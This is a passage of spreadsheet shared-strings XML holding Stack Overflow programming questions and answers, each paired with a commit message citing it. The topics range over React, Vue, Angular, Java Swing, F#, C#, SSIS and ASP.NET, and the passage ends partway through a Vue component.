  <si>
    <t>Wrap DatePicker inside a label to trigger focus on all cli
ck inside
See https://stackoverflow.com/a/42293096/7647005</t>
  </si>
  <si>
    <t>Just wrap DatePicker with label. All click inside label call focus on input, that open calendar.
&lt;label&gt;
    &lt;DatePicker/&gt;
&lt;/label&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">I'am unclear as to what the roles and responsibility of the factory class is.  I know enough that the factory class should be resposible for the creation of domain objects (aggregate root) along with its associated entities and value objects.
But what is not clear to me is where the factory "layer" lies with a DDD architecture? Should the factory be calling directly into the repository to get its data or the service library?  
Where does the factory fit into the following framework:
UI &gt; App &gt; Domain &gt; Service &gt; Data
Also, because the factory is the only place allowed for object creation would'nt you get circular references if you wanted to create your objects in your data and service layers?
If the role of the factory class is for object creation then what benefits does the service layer have?
I've asked a lot of questions and appreciate any response.  What i'am lacking is a sample application which demonstrates how all the layers in a domain driven design project come together...Is there anything out there?
</t>
  </si>
  <si>
    <t>C563</t>
  </si>
  <si>
    <t>[WIP] Add cetl::variant (#92)
This is just an ordinary variant, nothing special here.
Other changes:
- In CETLVaSt, move special member function policies from the optional test into a separate header to make them reusable for the variant test.
- Extend the typelist tools in CETLVaSt.
- Add standard type traits from C++17 (I needed them for the variant): `conjunction_v` etc.
- Add the `overloaded` helper class, which is not found in the standard library but is commonly used with visitation. We can move it somewhere if its current place is found unsuitable.
- Add `type_traits_ext.hpp` with type traits intended for internal use mostly.
- Change the SonarQube invocation to run it against an exception-enabled build to provide full coverage information.
- Doxygen:
  - Ignore the `detail` namespace.
  - Disable `WARN_AS_ERROR` because Doxygen v1.9 is unable to parse certain recursive templates correctly; see https://stackoverflow.com/a/77855566/1007777</t>
  </si>
  <si>
    <t>This warning appears to have been fixed in doxygen 1.10.0. My project have this annoying warning until today when we upgraded from 1.9.7.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to write a program that uses Java's GridLayout to display a 2x2 set of GIFs. It runs without any errors but the output window I get is blank. The same code works to display a text label or button in a cell, so it seems that the problem is with my use of images.&lt;/p&gt;
&lt;p&gt;All the GIF files are under the same src folder as the code, and IntelliJ is able to show them fine when hovering over the filenames -- they just don't show up when the program's run. Not sure where to check for issues.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import java.awt.*;
import javax.swing.*;
public class ShowFlags extends JFrame {
    public ShowFlags() {
        setLayout(new GridLayout(2, 2, 5, 5));
        ImageIcon imgA = new ImageIcon(&amp;quot;us.gif&amp;quot;);
        ImageIcon imgB = new ImageIcon(&amp;quot;norway.gif&amp;quot;);
        ImageIcon imgC = new ImageIcon(&amp;quot;uk.gif&amp;quot;);
        ImageIcon imgD = new ImageIcon(&amp;quot;fr.gif&amp;quot;);
        JLabel jlbA = new JLabel(imgA);
        JLabel jlbB = new JLabel(imgB);
        JLabel jlbC = new JLabel(imgC);
        JLabel jlbD = new JLabel(imgD);
        add(jlbA);
        add(jlbB);
        add(jlbC);
        add(jlbD);
    }
    public static void main(String[] args) {
        JFrame frame = new ShowFlags();
        frame.setTitle(&amp;quot;ShowFlags&amp;quot;);
        frame.setSize(300, 300);
        frame.setLocationRelativeTo(null);
        frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
        frame.setVisible(true);
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C564</t>
  </si>
  <si>
    <t>Added track progress + lengths
8/1/18
Changes:
- Live track position now works via componentDidMount, setInterval(), and API call
- url fixed (no more /playlists)
- added track lengths
Notes:
- semantic-ui-react has even more than bootstrap
- update component every second react - https://stackoverflow.com/questions/39426083/update-component-every-second-react</t>
  </si>
  <si>
    <t>You need to use setInterval to trigger the change, but you also need to clear the timer when the component unmounts to prevent it leaving errors and leaking memory:
componentDidMount() {
  this.interval = setInterval(() =&gt; this.setState({ time: Date.now() }), 1000);
}
componentWillUnmount() {
  clearInterval(this.interval);
}</t>
  </si>
  <si>
    <t xml:space="preserve">I am preparing for the development of an enterprise-style application for a very small business of 6 employees (including myself -- before you question why a 6-person company would need an enterprise application, we have a lot going on with a lot of processes and tools needed to simplify it).  As always I'm trying to follow best practices in setting up the project; I'm going to be using .NET 3.5, with the database being on Windows Server 2003/SQL Server 2005.
While I'm developing and testing the solution, should I have everything in my main project?  What I mean is... Visual Studio 2008 Professional lets you have "database projects" as well as all of the other types of projects.  For this application I'm going to need:
Database Project containing the create and test scripts for the new data schema
C# projects containing the actual code/application:
Customer-facing web site(s) using ASP.NET MVC
Back-end order processing system, probably web-based but possibly a "smart client"
SSIS project containing packages to ETL the "live" application data provided by our vendor(s) and migrate over existing customer and order data from the legacy database.
Reporting project for SQL Server Reporting Services
Basically, I am wondering if it's a good idea to have all of these as part of one massive Visual Studio solution (let's call it "EnterpriseSolution"), or if I should break them out and tackle them separately.  Most of the books and websites I've looked at include them all together, but they also assume a team of developers, DBAs, architects and the like - in this case I'm all of them rolled into one.  The database project and at least some ETL processes need to be done and loaded into production before the rest of the application is written, since we need to load the new vendor's products in a live environment (to start selling them).
I'm a little overwhelmed as to how I should begin to structure this, but I want to come up with an overall plan before I begin to lay things out and start coding.
Any suggestions on how to tackle a project like this?
</t>
  </si>
  <si>
    <t>C565</t>
  </si>
  <si>
    <t>Use PascalCase for the names of fields in a Record,
as per section 3.1 of the F# Component Design Guidelines:
http://fsharp.org/specs/component-design-guidelines/#naming-conventions
as per section RecordFieldNamesMustBePascalCase of FSharpLint:
http://fsprojects.github.io/FSharpLint/NameConventions.html
and as per this asnwer on Stack Overflow:
http://stackoverflow.com/a/984335/467754</t>
  </si>
  <si>
    <t>Yes, there is confusion, because F# has morphed from OCaml to .Net over the years. Basically, the naming conventions are a "breaking change" - old code is inconsistent with new code.
However, the May 2009 CTP has settled the issue.
The Release Notes say...
Standard Library Naming Conventions
The naming conventions adopted for the F# library are as follows:
All .NET and F# OO code uses PascalCase according to existing .NET guidelines
The F# functional programming operators such as List.map are for use in F# internal implementation code. This kind of code uses camelCase for operator names
Underscores should not be used.
So, your question...
Class.MyFunctionName or Module.my_function_name 
The answer is
Class.MyFunctionName and Module.MyFunctionName (but see edit below!)
(applying rule 1 above).
-- Edit. Nov 2, 2019 --
The current guidelines recommend camelCase for functions at module level, so it's
Module.myFunctionName
Which then makes production code consistent with the F# libraries (eg. List.averageBy)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are using the following source code for a Script Task of SSIS, targeting .NET Framework v4.7, and the corresponding C# language version should be v7.3.&lt;/p&gt;
&lt;p&gt;The source code can build successfully, however, when running in Visual Studio, &lt;code&gt;RegionEndpoint regionEndpoint = RegionEndpoint.USEast1;&lt;/code&gt; always triggers the following exception:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor) &lt;br&gt;
at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments) &lt;br&gt;
at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture) &lt;br&gt;
at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams) &lt;br&gt;
at Microsoft.SqlServer.Dts.Tasks.ScriptTask.VSTATaskScriptingEngine.ExecuteScript() &lt;br&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;For testing, if we comment out &lt;code&gt;RegionEndpoint regionEndpoint = RegionEndpoint.USEast1;&lt;/code&gt;, the script task can run successfully. So, we confirmed the culprit is in this line.&lt;/p&gt;
&lt;p&gt;We highly appreciate any hints and suggestions.&lt;/p&gt;
&lt;h3&gt;Details&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Partial project file:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre class="lang-xml prettyprint-override"&gt;&lt;code&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;
&amp;lt;Project ToolsVersion=&amp;quot;4.0&amp;quot; DefaultTargets=&amp;quot;Build&amp;quot; xmlns=&amp;quot;http://schemas.microsoft.com/developer/msbuild/2003&amp;quot;&amp;gt;
  &amp;lt;PropertyGroup&amp;gt;
...
    &amp;lt;TargetFrameworkVersion&amp;gt;v4.7&amp;lt;/TargetFrameworkVersion&amp;gt;
...
  &amp;lt;/PropertyGroup&amp;gt;
...
  &amp;lt;ItemGroup&amp;gt;
    &amp;lt;Reference Include=&amp;quot;AWSSDK.Core, Version=3.3.0.0, Culture=neutral, PublicKeyToken=885c28607f98e604, processorArchitecture=MSIL&amp;quot;&amp;gt;
      &amp;lt;HintPath&amp;gt;C:\my\work\xxx\packages\AWSSDK.Core.3.7.402.3\lib\net45\AWSSDK.Core.dll&amp;lt;/HintPath&amp;gt;
    &amp;lt;/Reference&amp;gt;
    &amp;lt;Reference Include=&amp;quot;Newtonsoft.Json, Version=13.0.0.0, Culture=neutral, PublicKeyToken=30ad4fe6b2a6aeed, processorArchitecture=MSIL&amp;quot;&amp;gt;
      &amp;lt;HintPath&amp;gt;C:\Users\user.name\AppData\Local\Temp\Vsta\SSIS_ST160\xxx\packages\Newtonsoft.Json.13.0.3\lib\net45\Newtonsoft.Json.dll&amp;lt;/HintPath&amp;gt;
    &amp;lt;/Reference&amp;gt;
    &amp;lt;Reference Include=&amp;quot;System&amp;quot; /&amp;gt;
    &amp;lt;Reference Include=&amp;quot;System.Data&amp;quot; /&amp;gt;
    &amp;lt;Reference Include=&amp;quot;System.Windows.Forms&amp;quot; /&amp;gt;
    &amp;lt;Reference Include=&amp;quot;System.Xml&amp;quot; /&amp;gt;
    &amp;lt;Reference Include=&amp;quot;Microsoft.SqlServer.ManagedDTS, Version=16.0.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91&amp;quot; /&amp;gt;
    &amp;lt;Reference Include=&amp;quot;Microsoft.SqlServer.ScriptTask, Version=16.0.0.0, Culture=neutral, PublicKeyToken=89845dcd8080cc91&amp;quot; /&amp;gt;
  &amp;lt;/ItemGroup&amp;gt;
...
&amp;lt;/Project&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start="2"&gt;
&lt;li&gt;The source code of C# Script Task in SSIS:&lt;/li&gt;
&lt;/ol&gt;
&lt;pre class="lang-cs prettyprint-override"&gt;&lt;code&gt;#region Namespaces
using System;
using Amazon;
#endregion
namespace ST_xxx
{
    [Microsoft.SqlServer.Dts.Tasks.ScriptTask.SSISScriptTaskEntryPointAttribute]
    public partial class ScriptMain : Microsoft.SqlServer.Dts.Tasks.ScriptTask.VSTARTScriptObjectModelBase
    {
        public async System.Threading.Tasks.Task Main()
        {
            try
            {
                string regionName = &amp;quot;us-east-1&amp;quot;;
                RegionEndpoint regionEndpoint = RegionEndpoint.USEast1;
            }
            catch (Exception ex)
            {
                Dts.Events.FireError(0, &amp;quot;Error&amp;quot;, ex.Message, string. Empty, 0);
                throw;
            }
            Dts.TaskResult = (int)ScriptResults.Success;
        }
        #region ScriptResults declaration
        enum ScriptResults
        {
            Success = Microsoft.SqlServer.Dts.Runtime.DTSExecResult.Success,
            Failure = Microsoft.SqlServer.Dts.Runtime.DTSExecResult.Failure
        };
        #endregion
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C566</t>
  </si>
  <si>
    <t>Added Material UI Buttons
Changed map controls buttons to material ui for consistency. Currently
not able to pass in 'event.target.id' into click event since it's somehow not
a normal click event if included in material UI button component?!
(semi) related issue: https://stackoverflow.com/questions/39076399/cant-get-the-target-attributes-of-material-ui-select-react-component</t>
  </si>
  <si>
    <t>##Update 2 In response to your comments:
As per the material-ui docs, getting back the touchtap event on option element rather than the select element is expected. If you want the id and name of the element, I would suggest binding the variables to the callback:
The onchange method in the parent component:
_onChange(id, name, evt, key, payload) {
  console.log(id);  //id of select
  console.log(name); //name of name
  console.log(payload); //value of selected option
}
And when you attach it to the select component, you need to use bind
   &lt;Select
     value={this.props.test}
     name={"test"}
     id={"test"}
     onChange={this.props.onChange.bind(null,"id","name")}
     hintText={"Select a fitch rating service"}&gt;
##Update Here are the react event docs. Under the event-pooling you will find reference to the use of e.persists() in the block quote. The explanation given in this issue is that React pools the event object, so it get's reused when another event is fired.
React has a rather special event object. It wraps the native event in a synthetic event, which is what event points to in your _onChange method. The problem is that this synthetic event object is recycled and reused for the next event, so it is garbage collected and set to null. I don't think this is well documented, but I'll search for a link and update this answer once I find it.
The solution is for the first line in your event handler to make a copy of the event, persist it, or get a reference to the native event:
##Make a copy of the event
_onChange = (event, index, value) =&gt; {
  e = _.cloneDeep(event); // Here I'm using the cloneDeep method provided by underscore / lodash . User whatever library you prefer. 
  console.log(e.target.id); 
  console.log(e.target.name); 
};
##Persist the event
_onChange = (event, index, value) =&gt; {
  event.persist() // This stops react from garbage collecting the event object. It may impact performance, but I doubt by much.
  console.log(event.target.id); 
  console.log(event.target.name); 
};
##Get a reference to the native event object
_onChange = (event, index, value) =&gt; {
  e = event.native; // This looks the same as a vanilla JS event
  console.log(e.target.id); 
  console.log(e.target.name); 
};</t>
  </si>
  <si>
    <t xml:space="preserve">In an n-tiered application where you are using custom entities, how do you find yourself handling data needed from lookup tables?  Do you create entities for each of these lookup tables or employ some other strategy? 
For example.  I have a "Ratings" lookup table that will be used to populate a dropdownlist.  Would you create a ratings object with a ratingid and rating property and pass that to your UI or is there a more efficient way to go about it?
Appreciate your thoughts.
</t>
  </si>
  <si>
    <t>C567</t>
  </si>
  <si>
    <t>Implement client API access token retrieval
The strategy for access token retrieval and use implemeneted here is to
get an access token once when the user logs in and the auth0 instance
starts up, and then add that token to an intercepter in a global axios
client via a useEffect React hook in the root App component. This way,
the we don't need to request a new token for every API call.
References:
- https://auth0.com/docs/quickstart/spa/react/02-calling-an-api
- https://stackoverflow.com/a/71558686
The CreateEvent component has been configured to use this global HTTP
client so that authorized users can create events using the `POST
/lessons` API endpoint.</t>
  </si>
  <si>
    <t>I solved this problem by passing the getAccessTokenSilently as a parameter to a function in my axios file.
import axios from "axios";
const httpClient = axios.create();
// adds access tokens in all api requests
// this interceptor is only added when the auth0 instance is ready and exports the getAccessTokenSilently method
export const addAccessTokenInterceptor = (getAccessTokenSilently) =&gt; {
  httpClient.interceptors.request.use(async (config) =&gt; {
    const token = await getAccessTokenSilently();
    config.headers.Authorization = `Bearer ${token}`;
    return config;
  });
};
export default httpClient;
Then in my App.jsx I used an useEffect to execute this function once the Auth0 instance is ready:
import { useEffect } from "react";
import { useAuth0 } from "@auth0/auth0-react";
import { addAccessTokenInterceptor } from "./api/httpClient";
const App = () =&gt; {
  const { getAccessTokenSilently } = useAuth0();
  useEffect(() =&gt; {
    addAccessTokenInterceptor(getAccessTokenSilently);
  }, [getAccessTokenSilently]);
   return (
    &lt;div&gt;
      Your app here...
    &lt;/div&gt;
  );
}
export default App;
Hope this helps!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a method with some generic type parameters; T,U,V.  I am using it with another helper method &lt;code&gt;GetAPIResponseAsync()&lt;/code&gt; to download all pages of records from a downstream API endpoint that has paging enabled, deserializing the JSON responses, and mapping them into a aggregated list of new objects of a type that better suits the front end website this API is serving.&lt;/p&gt;
&lt;p&gt;'T' represents the destination type of the objects once they have been mapped.&lt;/p&gt;
&lt;p&gt;'U' represents the class that the JSON responses from the downstream API are deserialised into.&lt;/p&gt;
&lt;p&gt;'V' represents the type of the objects in the 'Data' property in the 'U' class. U classes will always have a Data property of type &lt;code&gt;List&amp;lt;V&amp;gt;&lt;/code&gt; because they inherit from &lt;code&gt;FabricListResponse&amp;lt;V&amp;gt;&lt;/code&gt;, which defines a property of that type in the class definition.&lt;/p&gt;
&lt;p&gt;I want to remove the generic type parameter 'V' from &lt;code&gt;GetAllPagesAsync&lt;/code&gt; because the generic type for &lt;code&gt;FabricContactsResponse&lt;/code&gt; is specified in the class definition so it feels like I'm repeating myself.  But I'm not sure how to do it without creating syntax errors...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public async Task&amp;lt;ContactsResponse&amp;gt; GetAccountContactsAsync(string accountId, ILogger log)
{
    var contacts = await GetAllPagesAsync&amp;lt;ContactDTO,FabricContactsResponse,FabricContactDTO&amp;gt;($&amp;quot;/v1/account/{accountId}/contacts&amp;quot;, log);
    var response = new ContactsResponse
    {
        Contacts = mapper.Map&amp;lt;List&amp;lt;ContactDTO&amp;gt;&amp;gt;(contacts)
    };
    return response;
}
private async Task&amp;lt;List&amp;lt;T&amp;gt;&amp;gt; GetAllPagesAsync&amp;lt;T,U,V&amp;gt;(string endpoint, ILogger log) 
where T : class 
where U : FabricListResponse&amp;lt;V&amp;gt;
where V : class
{
    var contacts = new List&amp;lt;T&amp;gt;();
    U fabricApiResponse;
    var page = 1;
    do
    {
        fabricApiResponse = await apiService.GetAPIResponseAsync&amp;lt;U&amp;gt;(endpoint, page, log);
        contacts.AddRange(mapper.Map&amp;lt;List&amp;lt;T&amp;gt;&amp;gt;(fabricApiResponse.Data));
        page++;
    } while (fabricApiResponse.TotalPages &amp;gt; fabricApiResponse.CurrentPage);
    return contacts;
}
public class FabricContactsResponse : FabricListResponse&amp;lt;FabricContactDTO&amp;gt;;
public class FabricContactDTO : FabricContactResponse;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C568</t>
  </si>
  <si>
    <t>Make tests work by ignoring material schema
added import { NO_ERRORS_SCHEMA } from '@angular/core';
and
 schemas:      [ NO_ERRORS_SCHEMA ]
to each component spec so that it sode breadth only testing.  See stackoverflow
https://stackoverflow.com/questions/41240163/mocking-child-components-angular-2</t>
  </si>
  <si>
    <t>Careful about the NO_ERRORS_SCHEMA. Let's quote another part of the same the docs:
Shallow component tests with NO_ERRORS_SCHEMA greatly simplify unit testing of complex templates. However, the compiler no longer alerts you to mistakes such as misspelled or misused components and directives.
I find that drawback quite contrary to the purposes of writing a test. Even more so that it's not that hard to mock a basic component.
An approach not yet mentioned here is simply to declare them at config time:
@Component({
  selector: 'product-settings',
  template: '&lt;p&gt;Mock Product Settings Component&lt;/p&gt;'
})
class MockProductSettingsComponent {}
@Component({
  selector: 'product-editor',
  template: '&lt;p&gt;Mock Product Editor Component&lt;/p&gt;'
})
class MockProductEditorComponent {}
...  // third one
beforeEach(() =&gt; {
  TestBed.configureTestingModule({
      declarations: [
        ProductSelectedComponent,
        MockProductSettingsComponent,
        MockProductEditorComponent,
        // ... third one
      ],
      providers: [/* your providers */]
  });
  // ... carry on
});</t>
  </si>
  <si>
    <t xml:space="preserve">I'm working on an ASP.NET MVC project and I've come to the point where I want to start considering my caching strategy.  I've tried to leave my framework as open as possible for the use in caching.
From what I heard during Scott Hanselman's podcast StackOverflow.com uses page output caching and zips that content and puts it into RAM.  This sounds like this would be great for user-wide cache but for something like personalized pages you would have to cache a version for each user and that could get out of control very quickly.
So, for a caching strategy.  Which should be used, Output Caching, Data Caching or combined?  My first thoughts are both but as far as cache dependencies it sounds like it could get a bit complex.
</t>
  </si>
  <si>
    <t>C569</t>
  </si>
  <si>
    <t>Bug 64285 - Avoid NPE when Clearing after switching to a different LAF
tabbedPane.getTabComponentAt might return null in case tab component is not customized.
updateUI code should consider both getTabComponentAt and getComponentAt.
See https://stackoverflow.com/questions/988734/jtabbedpane-gettabcomponentatint-returning-null</t>
  </si>
  <si>
    <t>getTabComponentAt() returns the custom component you might add as the tab title. You might be looking for the getComponentAt() method to return the contents of a tab. The getSelectedIndex() just returns that the first tab is currently selected (it would return -1 for no tabs selected)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The  register page is not redirecting to the homeowner-dashboard page when I click on the register button. When clicking on it, literally nothing happens.&lt;/p&gt;
&lt;p&gt;I inspected the Console and all it shows is this&lt;/p&gt;
&lt;p&gt;Payload:
Object { name: &amp;quot;don jacob&amp;quot;, email: &amp;quot;coreyjames775@aol.com&amp;quot;, password: &amp;quot;Donuts!12&amp;quot;, password_confirmation: &amp;quot;Donuts!12&amp;quot; }
RegisterPage.vue:112:16&lt;/p&gt;
&lt;p&gt;So it shows the registration credentials in the Console. Also in the network tabs, all of the responses with GET methods have a status code of '200', possibly suggesting that the API call is working.&lt;/p&gt;
&lt;p&gt;When I posted this question about a week ago, I initially suspected that this was a backend (Django) API endpoint specific error. However, I finished running 3 unit tests for the login, registration and homeowner profile (the backend api to homeowner-dashboard) API endpoints with no errors.&lt;/p&gt;
&lt;p&gt;Here are the tests results for all 3 unit tests&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  show_sunset_warning()
System check identified no issues (0 silenced).
...
----------------------------------------------------------------------
Ran 3 tests in 1.166s
OK
Destroying test database for alias 'default'...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Therefore this is clearly a VueJS issue, not a Django one. Here are some important VueJS files:&lt;/p&gt;
&lt;p&gt;RegisterPage.vue&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;template&amp;gt;
  &amp;lt;layout-div&amp;gt;
    &amp;lt;div class=&amp;quot;row justify-content-md-center mt-5&amp;quot;&amp;gt;
      &amp;lt;div class=&amp;quot;col-4&amp;quot;&amp;gt;
        &amp;lt;div class=&amp;quot;card&amp;quot;&amp;gt;
          &amp;lt;div class=&amp;quot;card-body&amp;quot;&amp;gt;
            &amp;lt;h5 class=&amp;quot;card-title mb-4&amp;quot;&amp;gt;Register&amp;lt;/h5&amp;gt;
            &amp;lt;form&amp;gt;
              &amp;lt;div class=&amp;quot;mb-3&amp;quot;&amp;gt;
                &amp;lt;label htmlFor=&amp;quot;name&amp;quot; class=&amp;quot;form-label&amp;quot;&amp;gt;Name&amp;lt;/label&amp;gt;
                &amp;lt;input
                  type=&amp;quot;text&amp;quot;
                  class=&amp;quot;form-control&amp;quot;
                  id=&amp;quot;name&amp;quot;
                  name=&amp;quot;name&amp;quot;
                  v-model=&amp;quot;name&amp;quot;
                /&amp;gt;
                &amp;lt;div v-if=&amp;quot;validationErrors.name&amp;quot; class=&amp;quot;flex flex-col&amp;quot;&amp;gt;
                  &amp;lt;small class=&amp;quot;text-danger&amp;quot;&amp;gt;{{ validationErrors?.name[0] }}&amp;lt;/small&amp;gt;
                &amp;lt;/div&amp;gt;
              &amp;lt;/div&amp;gt;
              &amp;lt;div class=&amp;quot;mb-3&amp;quot;&amp;gt;
                &amp;lt;label htmlFor=&amp;quot;email&amp;quot; class=&amp;quot;form-label&amp;quot;&amp;gt;Email&amp;lt;/label&amp;gt;
                &amp;lt;input
                  type=&amp;quot;email&amp;quot;
                  class=&amp;quot;form-control&amp;quot;
                  id=&amp;quot;email&amp;quot;
                  name=&amp;quot;email&amp;quot;
                  v-model=&amp;quot;email&amp;quot;
                /&amp;gt;
                &amp;lt;div v-if=&amp;quot;validationErrors.email&amp;quot; class=&amp;quot;flex flex-col&amp;quot;&amp;gt;
                  &amp;lt;small class=&amp;quot;text-danger&amp;quot;&amp;gt;{{ validationErrors?.email[0] }}&amp;lt;/small&amp;gt;
                &amp;lt;/div&amp;gt;
              &amp;lt;/div&amp;gt;
              &amp;lt;div class=&amp;quot;mb-3&amp;quot;&amp;gt;
                &amp;lt;label htmlFor=&amp;quot;password&amp;quot; class=&amp;quot;form-label&amp;quot;&amp;gt;Password&amp;lt;/label&amp;gt;
                &amp;lt;input
                  type=&amp;quot;password&amp;quot;
                  class=&amp;quot;form-control&amp;quot;
                  id=&amp;quot;password&amp;quot;
                  name=&amp;quot;password&amp;quot;
                  v-model=&amp;quot;password&amp;quot;
                /&amp;gt;
                &amp;lt;div v-if=&amp;quot;validationErrors.password&amp;quot; class=&amp;quot;flex flex-col&amp;quot;&amp;gt;
                  &amp;lt;small class=&amp;quot;text-danger&amp;quot;&amp;gt;{{ validationErrors?.password[0] }}&amp;lt;/small&amp;gt;
                &amp;lt;/div&amp;gt;
              &amp;lt;/div&amp;gt;
              &amp;lt;div class=&amp;quot;mb-3&amp;quot;&amp;gt;
                &amp;lt;label htmlFor=&amp;quot;confirm_password&amp;quot;&amp;gt;Confirm password&amp;lt;/label&amp;gt;
                &amp;lt;input
                  type=&amp;quot;password&amp;quot;
                  class=&amp;quot;form-control&amp;quot;
                  id=&amp;quot;confirm_password&amp;quot;
                  name=&amp;quot;confirm_password&amp;quot;
                  v-model=&amp;quot;confirmPassword&amp;quot;
                /&amp;gt;
              &amp;lt;/div&amp;gt;
              &amp;lt;div class=&amp;quot;d-grid gap-2&amp;quot;&amp;gt;
                 &amp;lt;button
                  :disabled=&amp;quot;isSubmitting&amp;quot;
                  type=&amp;quot;button&amp;quot;
                  @click=&amp;quot;registerAction&amp;quot;&amp;gt;Register&amp;lt;/button&amp;gt;
                &amp;lt;p class=&amp;quot;text-center&amp;quot;&amp;gt;
                  Already have an account
                  &amp;lt;a href=&amp;quot;#&amp;quot; @click.prevent=&amp;quot;redirectToLogin&amp;quot;&amp;gt;Sign in&amp;lt;/a&amp;gt;
                &amp;lt;/p&amp;gt;
              &amp;lt;/div&amp;gt;
            &amp;lt;/form&amp;gt;
          &amp;lt;/div&amp;gt;
        &amp;lt;/div&amp;gt;
      &amp;lt;/div&amp;gt;
    &amp;lt;/div&amp;gt;
  &amp;lt;/layout-div&amp;gt;
&amp;lt;/template&amp;gt;
&amp;lt;script&amp;gt;
export default {
  name: 'RegisterPage',
  methods: {
    registerAction() {
      this.$router.push('/homeowner-dashboard');
    },
  },
};
&amp;lt;/script&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;HomeownerDashboard.vue&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;script setup lang=&amp;quot;ts&amp;quot;&amp;gt;
&amp;lt;/script&amp;gt;
&amp;lt;template&amp;gt;
  &amp;lt;LayoutDiv&amp;gt;
    &amp;lt;div class=&amp;quot;row justify-content-md-center mt-5&amp;quot;&amp;gt;
      &amp;lt;div class=&amp;quot;col-10&amp;quot;&amp;gt;
        &amp;lt;div class=&amp;quot;card&amp;quot;&amp;gt;
          &amp;lt;div class=&amp;quot;card-header&amp;quot;&amp;gt;
            &amp;lt;h5 class=&amp;quot;card-title&amp;quot;&amp;gt;Homeowner Dashboard&amp;lt;/h5&amp;gt;
          &amp;lt;/div&amp;gt;
          &amp;lt;div v-if=&amp;quot;dashboardData&amp;quot;&amp;gt;
            &amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Welcome, {{  dashboardData.name }}!&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
            &amp;lt;p&amp;gt;Your current location: {{  dashboardData.city }}, {{ dashboardData.state }}, {{ dashboardData.zip }}, {{ dashboardData.profilePic }}&amp;lt;/p&amp;gt;
            &amp;lt;div&amp;gt;
              &amp;lt;img
                v-if=&amp;quot;dashboardData.profilePic&amp;quot;
                :src=&amp;quot;dashboardData.profilePic&amp;quot;
                alt=&amp;quot;Profile Picture&amp;quot;
                class=&amp;quot;profile-pic&amp;quot;
              /&amp;gt;
              &amp;lt;p v-else&amp;gt;No profile picture available.&amp;lt;/p&amp;gt;
            &amp;lt;/div&amp;gt;
            &amp;lt;h6 class=&amp;quot;mt-4&amp;quot;&amp;gt;Pending Service Requests&amp;lt;/h6&amp;gt;
            &amp;lt;ul v-if=&amp;quot;dashboardData.pendingRequests.length&amp;quot;&amp;gt; 
              &amp;lt;li v-for=&amp;quot;(request, index) in dashboardData.pendingRequests&amp;quot; :key=&amp;quot;index&amp;quot;&amp;gt;
                {{  request.description  }} - {{ request.date }}
              &amp;lt;/li&amp;gt;
            &amp;lt;/ul&amp;gt;
            &amp;lt;p v-else&amp;gt;No pending service requests.&amp;lt;/p&amp;gt;
            &amp;lt;h6 class=&amp;quot;mt-4&amp;quot;&amp;gt;Your Saved Arborists&amp;lt;/h6&amp;gt;
            &amp;lt;ul v-if=&amp;quot;dashboardData.savedArborists.length&amp;quot;&amp;gt;
              &amp;lt;li v-for=&amp;quot;(arborist, index) in dashboardData.savedArborists&amp;quot; :key=&amp;quot;index&amp;quot;&amp;gt;
                {{ arborist.name }} ({{ arborist.companyName }})
              &amp;lt;/li&amp;gt;
            &amp;lt;/ul&amp;gt;
            &amp;lt;p v-else&amp;gt;No saved arborists yet.&amp;lt;/p&amp;gt;
            &amp;lt;button class=&amp;quot;btn btn-primary mt-3&amp;quot; @click=&amp;quot;viewSearchArborists&amp;quot;&amp;gt;Find Arborists&amp;lt;/button&amp;gt;
          &amp;lt;/div&amp;gt;
          &amp;lt;div v-else&amp;gt;
            &amp;lt;p&amp;gt;Loading Dashboard...&amp;lt;/p&amp;gt;
          &amp;lt;/div&amp;gt;
        &amp;lt;/div&amp;gt;
      &amp;lt;/div&amp;gt;
    &amp;lt;/div&amp;gt;
  &amp;lt;/LayoutDiv&amp;gt;
&amp;lt;/template&amp;gt;
&amp;lt;script lang=&amp;quot;ts&amp;quot;&amp;gt;
import axios from 'axios';
import LayoutDiv from '../LayoutDiv.vue';
import { defineComponent, DefineComponent } from 'vue';
import { error } from 'console';
interface DashboardData {
  name: string;
  city: string;
  state: string;
  zip: string;
  profilePic: string;
  pendingRequests: { description: string; date: string }[];
  savedArborists: { name: string; companyName: string }[];
}
export default defineComponent({
  name: 'HomeownerDashboard',
  components: {
    LayoutDiv,
  },
  data() {
    return {
      dashboardData: null as DashboardData | null,
    };
  },
  created() {
    this.fetchDashboardData();
  },
  methods: {
    fetchDashboardData() {
      axios
        .get('homeowner/profile/', {
          headers: { Authorization: 'Bearer ' + localStorage.getItem('token') },
        })
        .then((response) =&amp;gt; {
          this.dashboardData = response.data;
        })
